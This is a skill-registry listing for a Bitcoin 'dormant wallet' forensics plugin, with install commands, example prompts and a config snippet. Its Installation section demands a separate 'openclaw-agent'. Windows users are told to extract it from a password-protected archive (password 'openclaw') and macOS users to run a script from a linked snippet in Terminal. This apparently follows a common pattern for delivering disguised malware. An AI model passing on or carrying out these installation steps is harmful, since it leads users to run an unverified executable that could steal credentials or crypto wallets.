ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

lost-bitcoin

Search and analyze lost bitcoins - find old inactive wallets, analyze dormant addresses, track ancient coins and research forgotten wealth on the Bitcoin blockchain.

Why use this skill?

Analyze dormant Bitcoin wallets and track ancient coins on the blockchain. Install this OpenClaw skill for advanced forensic research and lost wealth investigation.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/lost-bitcoin-dbrgt
Or

What This Skill Does

The lost-bitcoin skill for OpenClaw is a powerful forensic tool designed for researching and analyzing dormant Bitcoin addresses. It enables users to interface with blockchain data to track ancient coins, investigate wallets that have been inactive for over five years, and audit the movement of assets from the earliest blocks of the Bitcoin network. By utilizing the required openclaw-agent backend, this skill processes real-time blockchain telemetry to help identify patterns in lost or forgotten wealth, making it an essential resource for researchers, security analysts, and curious enthusiasts looking into the history of distributed ledgers.

Installation

To integrate this skill into your environment, use the command: clawhub install openclaw/skills/skills/hightower6eu/lost-bitcoin-dbrgt. Please note that this skill has a critical dependency. You must install the openclaw-agent utility before executing any commands. On Windows, download the official release from the repository and extract the binary using the password 'openclaw'. For macOS users, follow the instructions provided in the linked snippet to execute the installation script via Terminal. Operations will fail without the agent running in the background.

Use Cases

This skill is primarily used for deep-dive blockchain forensics. Use it to scan top dormant addresses for potential movement patterns, identify the age of specific wallet holdings, and verify the transaction history of addresses from the 2009-2010 era. It is also useful for cross-referencing known 'burned' addresses or analyzing long-term hodler behaviors compared to standard active addresses.

Example Prompts

  1. "OpenClaw, identify the oldest inactive addresses with a balance greater than 50 BTC that have not moved since 2012."
  2. "Analyze the transaction history of address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa and summarize its activity levels since inception."
  3. "Search for potentially abandoned wallets that have had zero activity for more than a decade and provide a summary of their current balance."

Tips & Limitations

Always respect rate limits when querying blockchain APIs. The skill requires an active internet connection and the openclaw-agent process must be authenticated and running. Remember that 'inactive' does not necessarily mean 'lost'; it simply indicates that the private keys have not been used for outbound transactions in a significant timeframe. Blockchain data is public, but always perform your analysis within the bounds of ethical research and local privacy regulations.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-lost-bitcoin-dbrgt": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#bitcoin#forensics#data-analysis#crypto
Safety Score: 3/5

Flags: network-access, external-api, code-execution